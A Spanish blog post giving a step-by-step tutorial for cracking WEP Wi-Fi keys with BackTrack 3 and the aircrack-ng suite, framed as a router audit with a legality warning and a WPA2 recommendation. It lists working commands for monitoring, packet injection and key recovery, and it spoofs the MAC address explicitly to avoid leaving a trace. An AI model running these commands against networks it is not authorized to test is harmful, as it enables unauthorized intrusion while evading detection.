The quieter you become, the more you are able to hear


Este artículo es un “tutorial” para crackear cifrados WEP con la distribución BackTrack 3 en live CD. Internet está plagada ahora mismo de tutoriales como este y la publicación del mismo es por petición de dos amigos foncielloindependiente y coqueamago, que lo necesitaban para hacer una auditoría de un router de su empresa.

Los pasos descritos a continuación son para uso en routers propios, ya que el crackeado de cifrados WEP de routers ajenos es una acción ilegal tipificada en las leyes de muchos paises.

Como es un tutorial que se encuentra por todas partes, voy a resumirlo muchísimo simplificándolo al máximo y adaptado a una tarjeta con chipset 3945.

Primero preparamos la tarjeta, cambiamos la mac de la tarjeta para no dejar rastro y comenzamos la monitorización de las redes wifi disponibles.

bt# modprobe -r iwl3945

bt# modprobe ipwraw

bt# iwconfig

bt# airmon-ng stop wifi0

bt# macchanger –mac 00:11:22:33:44:55 wifi0

bt# airmon-ng start wifi0

Con airmon-ng start wifi0 iniciamos la monitorización de las redes wifi disponibles en el alcance del equipo. El software nos revela mucha información de las mismas pero en este caso nos interesan los siguientes campos BSSID (dirección MAC del router), CH (canal de emisión del router) y ESSID (nombre de la wifi).

bt# airodump-ng -c[canal] -w[red.out] –bssid wifi0

Ahora dejamos este comando corriendo y abrimos otra consola de comandos.

bt# aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] wifi0

bt# aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 wifi0

Si no hay tráfico en la red podemos ejecutar en vez del comando anterior, este que detallo a continuación:

bt# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:55 wifi0

De cualquiera de las dos formas pero en especial si no hay tráfico en la red, va a tardar el tema. Hora de ponerse a hacer otras cosas.

Una vez hay muchos paquetes y ha subido la columna de #data hora de crackear:

bt# aircrack-ng -n [bits de cifrado 64/128] -b [bssid] archivo.cap

Esto demuestra lo sencillísimo que resulta crackear cualquier red wifi con cifrado WEP de 64 o 128 bits.

Recomiendo encarecidamente usar cifrado WPA2…y foncielloindependiente y coqueamago me debeis una.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: